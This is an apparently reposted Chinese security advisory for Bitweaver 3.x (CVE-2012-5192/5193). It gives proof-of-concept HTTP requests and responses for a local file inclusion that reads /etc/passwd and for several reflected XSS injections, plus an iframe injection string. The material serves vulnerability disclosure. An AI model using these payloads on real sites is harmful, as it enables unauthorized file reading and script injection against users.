发布日期:2012-10-23
更新日期:2012-10-28受影响系统:
Bitweaver Bitweaver 3.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 56230
CVE ID: CVE-2012-5192,CVE-2012-5193Bitweaver是免费的开源Web应用框架和内容管理系统。Bitweaver 3.1及其他版本存在多个安全漏洞,攻击者可利用这些漏洞在受影响站点用户浏览器内执行任意脚本代码、窃取cookie身份验证凭证、在Web服务器进程中打开或运行任意文件。1)通过"username" POST参数向users/remind_password.php传递的输入,"days" POST参数向stats/index.php传递的输入、"login" POST参数向users/register.php传递的输入没有正确过滤即被返回给用户。可被利用在受影响站点的用户浏览器中执行任意HTML和脚本代码。2)通过"textarea_id" 参数向quicktags/special_chars.php传递的输入,"email" POST参数向users/register.php传递的输入没有正确过滤即被返回给用户。可被利用在受影响站点的用户浏览器中执行任意HTML和脚本代码。<*来源:David Aaron
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Finding 1: Local File Inclusion Vulnerability
CVE: CVE-2012-5192The "overlay_type" parameter in the "gmap/view_overlay.php" page in
Bitweaver is vulnerable to a local file inclusion vulnerability.This vulnerability can be demonstrated by traversing to a known readable
path on the web server file system.Example:Performing LFI on "overlay_type" parameter#Requesthttp://www.example.com/bitweaver/gmap/view_overlay.php?overlay_type=..%2F..%2F..%2F..%2F..%2F..%2F..%2F/etc/passwd%00#Responseroot:x:0:0:root:/root:/bin/bash
<snip>Finding 2: Multiple XSS Vulnerabilities in Bitweaver
CVE: CVE-2012-5193Multiple cross-site scripting (XSS) vulnerabilities have been discovered
that allow remote unauthenticated users to run arbitrary scripts on the
system.Example:The following Proof of Concepts illustrate that Bitweaver 2.8.1 is
vulnerable to XSS.Example(s):1. Performing XSS on stats/index.php#RequestGET /bitweaver/stats/index.php/%22%3E%3Cscript%3Ealert("XSS")%3B%3C%2Fscript%3E HTTP/1.0#ResponseHTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:42:34 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=4gmfnd86ahtvn34v5oejgivvh3; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
[truncated due to length]2. Performing XSS on /newsletters/edition.php#RequestGET /bitweaver/newsletters/edition.php/%22%3E%3Cscript%3Ealert("XSS")%3B%3C%2Fscript%3E HTTP/1.0#ResponseHTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:42:02 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=ajdjp797r7atral75rmlhcgs63; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
[truncated due to length]3. Performing XSS on the "username" parameter available on /users/#RequestPOST /bitweaver/users/remind_password.php HTTP/1.1
Host: www.example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 192username=%22%3E%3Cscript%3Ealert("XSS")%3B%3C%2Fscript%3E&remind=Reset+%28password%29#ResponseHTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:53:11 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=i0ktqmt3497thag552t9ds78v4; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 15974
[truncated due to length]<snip>
Invalid or unknown username: ">alert("XSS");</p></div>Please follow the instructions in the email.
<snip>4. Performing XSS on the "days" parameter on /stats/index.php#RequestPOST /bitweaver/stats/index.php HTTP/1.1
Host: www.example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 177days=%22%3E%3Cscript%3Ealert("XSS")%3B%3C%2Fscript%3E&pv_chart=Display#Response
HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:55:53 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=dqdvcnmql8jhngp0tphseh1qh4; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 24778
[truncated due to length]<snip>
<img src="/stats/pv_chart.php?days="><script>alert("XSS");</script>" alt="Site Usage Statistics" />
<snip>5. Performing XSS on the "login" parameter on /users/register.php. (try
entering "><IFRAME src="https://www.trustwave.com" height="1000px"
width="1000px"> into the "Username field"):http://www.example.com/bitweaver/users/register.php
6. Performing XSS on the "highlight" parameter:#RequestGET /bitweaver/?highlight=%2522%253E%253Cscript%253Ealert("XSS")%253B%253C%252Fscript%253E HTTP/1.0#ResponseHTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:59:09 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=ama93jqlojmi385plkft5opl64; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8建议:
--------------------------------------------------------------------------------
厂商补丁:Bitweaver
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.bitweaver.org/Linux Kernel "ext4_convert_unwritten_exten()"函数本地信息泄露漏洞GRAND Flash Album Gallery WordPress插件多个远程漏洞相关资讯 跨站脚本执行漏洞 Bitweaver Bitweaver安全漏洞
- HP Network Node Manager i多个不 (02/05/2013 09:14:03)
- JBoss Enterprise Portal Platform (01/26/2013 08:05:16)
- Advantech WebAccess HMI/SCADA不 (01/11/2013 08:47:20)
| - Google Web Toolkit 跨站脚本执行 (01/26/2013 08:08:23)
- Apache CouchDB 跨站脚本执行漏洞 (01/19/2013 09:24:15)
- Feng Office跨站脚本执行和越权操 (11/25/2012 07:25:26)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您
|
易网时代-编程资源站